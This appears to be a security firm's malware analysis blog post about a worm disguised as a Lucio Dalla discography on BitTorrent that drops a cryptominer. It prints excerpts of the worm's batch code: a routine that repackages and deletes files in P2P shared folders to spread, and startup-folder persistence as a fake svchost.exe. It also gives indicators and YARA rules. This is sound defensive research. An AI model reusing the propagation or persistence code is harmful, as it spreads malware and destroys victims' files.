P2P Worm Spreads Crypto-Miners in the Wild
07/23/2019
Introduction
In the past months we published a white paper exploring the risks that users can encounter when downloading materials from P2P sharing network, such as the Torrent one. We discussed how crooks easily lure their victims to download malware along with the desired content. Recently, our threat monitoring operations pointed us to an interesting file named “Lucio Dalla Discografia Completa”: this file pretends to be a collection of the discography of a famous italian singer, but it actually hides malicious intents.
For this reason, Cybaze-Yoroi ZLAB dissected this malware threat revealing its hidden virulent nature.
Technical Analysis
As anticipated, the file downloaded from the BitTorrent network is an executable. A quick recon revealed it actually is an SFX archive containing several other files.
| Hash | f9b2e61200addf760d7bd157c73201e97257b12d5177837a1bffb98f4064e76a |
| Threat | Miner-Dropper |
| Brief Description | Coin-miner dropper (SFX archive) |
| Ssdeep | 98304:BbEwGxyUOn/JaYYaeY+dM6YydmOQ1zYuuUBb53+munE0dMp1oHnXZetvRfuODYN |
Table 1: Static Information about the miner dropper
The usage of archive like SFX allows the attacker to hide the content of the malicious PE and significantly reduce the detection rate. Opening the sample with a common archive manager like WinRAR or 7z, unveil its content.
The archive contains more than a dozen of files. In detail it embeds:
- 16 temporary files used during execution;
- a Visual Basic Script;
- a batch script;
- and a setup file
On the right of Figure 1 it is possible to see the SFX configuration file. After the auto-extraction, the first file run is “run.vbs”. Its content is minimal and quickly redirect the execution to a small batch file, “installer.bat” contained in the same folder. Then it runs installer.bat (the filename) with the parameter "0" (WindowStyle hidden, to avoid hidden windows because it may trigger AntiViruses heuristics) and "true" (WaitOnReturn).
The content of “installer.bat” file is also minimal and points to a more complex text file "007.tmp", later renamed as "007.bat". That file weighs over 59 KB and contains more interesting functionalities.
Unlike the previous script, the “007” file performs many operations. The first one is to copy of all files contained in the extraction path directory into “#” subdirectory and to rename some of the just extracted files, suggesting some of the files are dependencies of a more complex chain.
@echo off & setlocal enabledelayedexpansion set CURRDIR=%~dp0 md # copy "%CURRDIR%/002.tmp" "%CURRDIR%/#/002.tmp" copy "%CURRDIR%/003.tmp" "%CURRDIR%/#/003.tmp" copy "%CURRDIR%/004.tmp" "%CURRDIR%/#/004.tmp" copy "%CURRDIR%/005.tmp" "%CURRDIR%/#/005.tmp" copy "%CURRDIR%/006.tmp" "%CURRDIR%/#/006.tmp" copy "%CURRDIR%/007.tmp" "%CURRDIR%/#/007.tmp" copy "%CURRDIR%/008.tmp" "%CURRDIR%/#/008.tmp" copy "%CURRDIR%/010.tmp" "%CURRDIR%/#/010.tmp" copy "%CURRDIR%/011.tmp" "%CURRDIR%/#/011.tmp" copy "%CURRDIR%/013.tmp" "%CURRDIR%/#/013.tmp" copy "%CURRDIR%/014.tmp" "%CURRDIR%/#/014.tmp" copy "%CURRDIR%/016.tmp" "%CURRDIR%/#/016.tmp" copy "%CURRDIR%/installer.bat" "%CURRDIR%/#/installer.bat" copy "%CURRDIR%/run.vbs" "%CURRDIR%/#/run.vbs" copy "%CURRDIR%/002.tmp" "%CURRDIR%/7z.exe" copy "%CURRDIR%/003.tmp" "%CURRDIR%/7z.dll" copy "%CURRDIR%/004.tmp" "%CURRDIR%/Default.SFX" copy "%CURRDIR%/005.tmp" "%CURRDIR%/Rar.exe" copy "%CURRDIR%/006.tmp" "%CURRDIR%/sfx.conf
Code Snippet 1: Copy of the files in a subfolder
After that, it generates three different files named “001.tmp”, “32.tmp” and “64.tmp”, later renamed with “.exe” suffix. They are created by mixing up the original files. In particular: “001.tmp” is created combining file “008.tmp”, “009.tmp” and “010.tmp”. The resulting executable have been split in those files, evading AV signatures.
But this composed executable hides another interesting detail. Before merging the file slices, the script replaces part of the PE header: it overrides the “This program cannot be run in DOS mode” string with random chars, generating different files hashes at every infection. This polymorphic techniques implemented directly in bash stage is applied to all the other files chunked and embedded into the original SFX archive.
After that, the script tries to use the just created “Rar.exe” and “7z.exe” files to create new SFX file in other directories belonging to the P2P platforms. This trick is used to spread the attack across the file-sharing communities, to compromise much more victims and to keep the infection alive. An example of this routine is the following:
for /d /r "c:\" %%a in (preferences.ini) do (
if exist "%%a" (
for /f %%b in ('findstr /c:"IncomingDir=" "%%a"') do (
set "var=%%b"
for %%c in ("!var:~12!\*.*") do (
ECHO ERRO %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% > "%CURRDIR%#\setup"
rar a -r -sfx -m5 -ep1 -zsfx.conf "%%~nc".exe #\*
7z a -tzip -mx=0 "%%~nc".zip "%%~nc".exe
del "%%~nc".exe
del "%%c"
move "%%~nc.zip" "!var:~12!\" ))))
[...]
for /d /r "c:\" %%a in (*) do (
if /i "%%~nxa"=="my grokster" (
set "var=%%a" (
for %%c in ("!var!\*.*") do (
ECHO ERRO %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% > "%CURRDIR%#\setup"
rar a -r -sfx -m5 -ep1 -zsfx.conf "%%~nc".exe #\*
7z a -tzip -mx=0 "%%~nc".zip "%%~nc".exe
del "%%~nc".exe
del "%%c"
move "%%~nc.zip" "!var!\" ))))
Code Snippet 2: Example of propagation routine
All these actions are performed for each system drive letter, such as C:, D:, X: and so on. After that, the script looks for the Microsoft Windows OS version from “5.x” to “15.x” and finally executes several specific routines according to the target machine. These routines perform a few basic operations:
- Create a new directory in “%systemdrive\AppCache\x86%” and immediately hide it;
- Copy the file “001.tmp” in the Startup Folder (for every OS language) renaming it as “svchost.exe” and the file 32/64.tmp in “AppCache\x86\”;
- Execute “001.exe” file.
:win7 if defined PROGRAMFILES(X86) (goto x64) else (goto x86) :x64 mkdir %systemdrive%\AppCache\x86 attrib +s +h %systemdrive%\AppCache\x86 attrib +s +h %systemdrive%\AppCache copy /y "%CURRDIR%\001.tmp" "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe" copy /y "%CURRDIR%\001.tmp" "%systemdrive%\users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe" [...] copy /y "%CURRDIR%\64.tmp" "%systemdrive%\AppCache\x86\svchost.exe" attrib +h "%systemdrive%\AppCache\x86\svchost.exe" "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe" "%systemdrive%\users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe" [...] goto end
Code Snippet 3: Choose of the files to copy whether the target architecture is x86 or x64
At this point, the malicious control passes to the 001.exe file located in the Startup folder.
The 001 File
The 001.exe is actually packed with a known version of the UPX compressor. So, the extraction of the payload is quite straight forward.
| Hash | b6080b2786d2e4ac30207fb2f177046cfd40fa6578c56f3dfd13abab7d62e2ea |
| Threat | Miner Launcher |
| Brief Description | Coin-miner Payload (001.exe) packed with UPX |
| Ssdeep | 3072:A3VD85gJFV8QncMujKCv0jqAi0hIazLEHYxWVfhn+zM45uUyvHBsV2svkgfODQ2C |
Table 2: Generic info about the Miner Loader
| Hash | 7bd25bd3c0f003ffea67c846b4fefd8fb8b4f72d836544d0ef786c5c6c63b422 |
| Threat | Miner Launcher Decompressed |
| Brief Description | Coin-miner Payload (001.exe) unpacked |
| Ssdeep | 12288:7EyxWjS8ZZVajy6YWgHQ+oHxlJz4UE0UsZ+GmYNuuv:oyxWjS8ZZVUYWgw1Hh |
Table 3: Generic info about the Miner Loader unpacked
Analyzing the decompressed binary, we noticed the malware firstly tries to run the “svchost.exe” binary contained in “%systemdrive%\AppCache\x86”, which likely is the real payload.
The Payload
| Hash | 73bc41504045e4e6de1b63ec40433afabf316141b1289c69905ee946e1b1a263 |
| Threat | Miner-Payload |
| Brief Description | Coin-miner Payload (32.exe) packed with UPX (minerd) |
| Ssdeep | 73bc41504045e4e6de1b63ec40433afabf316141b1289c69905ee946e1b1a263 |
Table 4: Generic Information of the Coininer compiled in 32 bit (UPX packed)
| Hash | a3574e73234e18be8d233c9e3fa3819600fc40341d8be8fc4449e4e73632ad6d |
| Threat | Miner-Payload |
| Brief Description | Coin-miner Payload (64.exe) packed with UPX (minerd) |
| Ssdeep | 49152:sb5CY+muocuUwlCdMsQd1pSHn/5JKIezmMNkG7403EIlnDysnue759ByzPIYNUN |
Table 5: Generic Information of the Coininer compiled in 32 bit (UPX unpacked)
The “svchost.exe” placed in the file “%systemdrive%\AppCache\x86” folder actually is one of the two files “32.exe” and “64.exe” previously created. After unpacking routines, the results are the following.
| Hash | 746d17e8d0b961f0c7733f155152fa54d2610fc6d117217d24f32d3ad370075e |
| Threat | Miner-Payload |
| Brief Description | Coin-miner Payload (32.exe) unpacked (minerd) |
| Ssdeep | 196608:aN8/juE4Be73AeWNEwVGuhcf7eVhbjYV:tuwUbK |
Table 6: Generic Information of the Coininer compiled in 64 bit (UPX packed)
| Hash | 552a4cbd2628d16d1fc910c9fc24bc426cafdf0f755f7b4013484adbc0393ca7 |
| Threat | Miner-Payload |
| Brief Description | Coin-miner Payload (64.exe) unpacked(minerd) |
| Ssdeep | 393216:6ovgtbTTTpT1TITHThTtTwTaTtTVTFTZTlTNTbTwTuTzT1T0TtTlT1ToTlTzTVTz:6 |
Table 7: Generic Information of the Coininer compiled in 64 bit (UPX packed)
Obviously, these hashes changes at every infection due to the polymorphic technique implemented in the bash stage previously described. The unique purpose of “001.exe” is the execution of “32.exe” or “64.exe” contained in “%systemdrive%\AppCache\x86”, a stratum-based coinminer. Stratum is the de-facto standard protocol used by crypto-miners to connect to mining pools.
Exploring the sample we notice that it actually is “MinerD”, an open-source cryptomining software publicly available on GitHub.
Conclusion
This malware threat reminds us of the hidden risks of downloading material through p2p networks, along with the tricks adopted by the crooks to keep the campaign running in the wild. Indeed, this sample is able to survive across multiple p2p network by propagating to p2p shared folders configured into the victim machine, ensuring a good level of resilience from the attacker point of view. Also, the attackers implemented polymorphic trick directly in batch language, replacing of part of the PE file header to create unique samples on each infection .
A naive or a distracted user can be lured to download infected media contents with the promise to ear his favorite musician, but this action can be compromise the machine of the victim and feed the cyber-criminals behind this campaign. This time, the consequences of such lack of awareness are quite contained, the final payload is actually a crypto-miner and the user may only experience delays or crashes, but what if the payload contains a bot a RAT, or even a ransomware? The consequences could be decisely more serious.
Indicators of Compromise
Hash
- f9b2e61200addf760d7bd157c73201e97257b12d5177837a1bffb98f4064e76a
- b6080b2786d2e4ac30207fb2f177046cfd40fa6578c56f3dfd13abab7d62e2ea
- 7bd25bd3c0f003ffea67c846b4fefd8fb8b4f72d836544d0ef786c5c6c63b422
- 73bc41504045e4e6de1b63ec40433afabf316141b1289c69905ee946e1b1a263
- a3574e73234e18be8d233c9e3fa3819600fc40341d8be8fc4449e4e73632ad6d
- 746d17e8d0b961f0c7733f155152fa54d2610fc6d117217d24f32d3ad370075e
- 552a4cbd2628d16d1fc910c9fc24bc426cafdf0f755f7b4013484adbc0393ca7
Mining Pool (Coin-Miner):
- tcp://xcnpool[.1gh[.com
Yara Rules
rule LucioDalla_CoinMiner_SFX_201907 {
meta:
description = "Yara Rule for SFX file of Lucio Dalla CoinMiner"
author = "ZLAB Yoroi - Cybaze"
last_updated = "2019-07-12"
tlp = "white"
category = "informational"
strings:
$s1 = "SFX module - Copyright (c) 2005-2012 Oleg Scherbakov"
$s2 = "7-Zip archiver - Copyright (c) 1999-2011 Igor Pavlov"
$s3 = "7-Zip - Copyright (c) 1999-2011 " ascii
$s4 = "sfxelevation" ascii wide
$h1 = { 30 ?? ?? 2E 74 6D 70 }
$setup = "setup" wide ascii
condition:
any of ($s*) and $setup and (#h1 > 8)
}
rule LucioDalla_001_UPX_201907 {
meta:
description = "Yara Rule for 001 UPX file file of Lucio Dalla CoinMiner"
author = "ZLAB Yoroi - Cybaze"
last_updated = "2019-07-12"
tlp = "white"
category = "informational"
strings:
$s1 = "UPX"
$h1 = { CB 40 5A 3E 2A E5 A2 C3 }
$h2 = { 38 D5 CD 57 3F E4 BF 45 }
$h3 = { 21 54 68 69 73 20 ?? ?? ?? ?? ?? ?? ?? 20 63 61 6E 6E 6F 74 20 62 65 20 72 75 }
condition:
all of them
}
rule LucioDalla_001_Unpacked_201907 {
meta:
description = "Yara Rule for 001 unpacked file file of Lucio Dalla CoinMiner"
author = "ZLAB Yoroi - Cybaze"
last_updated = "2019-07-12"
tlp = "white"
category = "informational"
strings:
$s1 = "zPLR"
$s2 = "\\AppCache\\x86\\svchost.exe"
$h1 = { 24 E8 5A CF FF FF 83 EC 04 }
$h2 = { 21 54 68 69 73 20 ?? ?? ?? ?? ?? ?? ?? 20 63 61 6E 6E 6F 74 20 62 65 20 72 75 }
condition:
all of them
}
rule LucioDalla_Miner_Workers_201907 {
meta:
description = "Yara Rule for all CoinMiner Workers"
author = "ZLAB Yoroi - Cybaze"
last_updated = "2019-07-12"
tlp = "white"
category = "informational"
strings:
$upx = "UPX"
$hpa32 = { 42 DA 92 BF 2D BB F0 B0 }
$hpb32 = { 2F 4D 7B 8C 83 FB 03 FF C2 }
$hp64a = { B0 29 74 3A 48 55 04 6C 30 }
$hp64b = { 11 60 6C A4 E9 FA 71 BE 47 }
$s1 = "blowfish.c"
$s2 = "mpih-rshift-asm"
$s3 = { D0 67 EC 67 B6 67 AF 67 F5 }
condition:
($upx and 2 of ($hp*)) or (all of ($s*))
}This blog post was authored by Luigi Martire, Davide Testa and Luca Mella of Cybaze-Yoroi Z-LAB
